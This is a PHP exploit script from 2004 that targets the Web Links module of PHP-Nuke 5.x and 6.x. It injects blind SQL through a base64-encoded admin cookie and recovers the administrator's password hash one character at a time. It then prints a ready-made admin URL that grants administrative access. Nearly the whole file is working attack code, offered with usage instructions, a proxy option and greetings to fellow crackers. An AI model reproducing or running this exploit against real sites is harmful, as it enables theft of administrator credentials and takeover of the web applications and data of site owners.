#!/usr/bin/php -q PHPnuke 6.x and 5.x fetch author hash by pokleyzz (Web Links module) # 3rd January 2004 : 9:29 a.m # (Web Links module) # # bug found by pokleyzz (3rd January 2004 ) # # Requirement: # PHP 4.x with curl extension; # # Greet: # tynon, sk ,wanvadder, sir_flyguy, wxyz , tenukboncit, kerengga_kurus , # s0cket370 , b0iler, syscalls and ... # # Happy new year 2004 ... # # ---------------------------------------------------------------------------- # "TEH TARIK-WARE LICENSE" (Revision 1): # wrote this file. As long as you retain this notice you # can do whatever you want with this stuff. If we meet some day, and you think # this stuff is worth it, you can buy me a "teh tarik" in return. # ---------------------------------------------------------------------------- # (Base on Poul-Henning Kamp Beerware) # # */ if (!(function_exists('curl_init'))) { echo "cURL extension required\n"; exit; } ini_set("max_execution_time","999999"); $matches = "admin\.php\?op=LinksModLink"; //$url = "http://127.0.0.1/src/phpnuke441a/html"; $charmap = array (48,49,50,51,52,53,54,55,56,57, 97,98,99,100,101,102, 103,104,105, 106,107,108,109,110,111,112,113, 114,115,116,117,118,119,120,121,122 ); if($argv[1] && $argv[2]){ $url = $argv[1]; $author = $argv[2]; if ($argv[3]) $proxy = $argv[3]; } else { echo "Usage: ".$argv[0]." [proxy]\n\n"; echo "\tURL\t URL to phpnuke site (ex: http://127.0.0.1/html)\n"; echo "\taid\t author id to get (ex: god)\n"; echo "\tproxy\t optional proxy url (ex: http://10.10.10.10:8080)\n"; exit; } $module = "/modules.php?name=Web_Links&l_op=MostPopular"; $cookie = "admin={$admin}"; $ch = curl_init(); if ($proxy){ curl_setopt($ch, CURLOPT_PROXY,$proxy); } curl_setopt($ch, CURLOPT_URL,$url.$module); curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); $res=curl_exec ($ch); curl_close ($ch); if (!ereg("name=Web_Links&l_op=visit",$res)){ echo "Not vulnerable. No link available\n"; exit(); } echo "Take your time for Teh Tarik... please wait ...\n\n"; echo "Result:\n"; echo "\t$author:"; $admin = $author.":"; for($i= 1;$i< 33;$i++){ foreach ($charmap as $char){ echo chr($char); $admin = ereg_replace("=","%3d",base64_encode("{$author}' and ascii(substring(pwd,$i,1))=$char/*:killu:killu")); $cookie = "admin={$admin}"; $ch = curl_init(); if ($proxy){ curl_setopt($ch, CURLOPT_PROXY,$proxy); } curl_setopt($ch, CURLOPT_URL,$url.$module); curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); //curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_COOKIE, $cookie); $res=curl_exec ($ch); curl_close ($ch); if (ereg($matches,$res)){ //echo chr($char); $admin .= chr($char); break 1; } else { echo chr(8); } if ($char ==103){ echo "\n\n\tNot Vulnerable or Something wrong occur ...\n"; exit; } } } $admin .= "::"; echo "\n\nAdmin URL:\n"; echo "\t$url/admin.php?admin=".ereg_replace("=","%3d",base64_encode($admin)); echo "\n"; echo "\n\nEnjoy your self and Happy New Year 2004...."; //if (eregi("^windows",$_ENV['OS'])){ // exec("explorer \"$url/admin.php?admin=".ereg_replace("=","%3d",base64_encode($admin))."\""); //} ?>